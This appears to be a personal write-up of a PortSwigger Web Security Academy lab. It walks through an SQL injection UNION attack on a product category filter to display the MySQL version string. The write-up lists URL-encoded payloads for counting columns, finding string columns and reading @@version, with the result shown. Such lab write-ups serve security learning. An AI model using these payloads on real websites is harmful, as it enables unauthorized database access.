This lab contains an [SQL injection](https://portswigger.net/web-security/sql-injection) vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.

To solve the lab, display the database version string.

# Practical
Click on the website and move around to see how it works. Looks like the only thing that might be vulnerable is on categories.
```html
https://ac211f8d1e8d4f878012848800a900a0.web-security-academy.net/filter?category=Gifts
```
Let's see if it's vulnerable or not.
```html
https://ac211f8d1e8d4f878012848800a900a0.web-security-academy.net/filter?category='
```
And we get an Server Error so yes.
We'll try an UNION attack on it, so let's try to determine the columns and data type first.
Let's try the first method first.
```sql
' ORDER BY 1 #
```
I tried this and didn't work. I tried the second method and it also didn't work. So I did this in Burp and URL encoded my payload it worked.
```sql
'+ORDER+BY+1+%23
```
Incrementing it 1 by 1, it breaks at 3. So possibility is that it has 2 columns.
Let's try the second method this time.
```sql
'+UNION+SELECT+NULL,NULL,NULL%23
```
It breaks at 3 NULL and works at 2

Now we need to determine the datatype.We want a string so let's test for it in each NULL positions.
```sql
'+UNION+SELECT+'a',NULL%23
```
The first one no errors so it is a string column.
Let's try number 2.
```sql
'+UNION+SELECT+'a','b'%23
```
And b returns fine two so both of them are columns so we can use either one. 

Now let's view the cheat sheet to see how to get the version from a MySQL database.
```sql
SELECT @@version
```

Now let's try to craft our payload.
```sql
'+UNION+SELECT+NULL,%40%40version%23
```
Let's make the other one NULL and the other one version. Note that this is URL encoded. Testing the payload and :
```txt
8.0.25
```
We solved the lab!



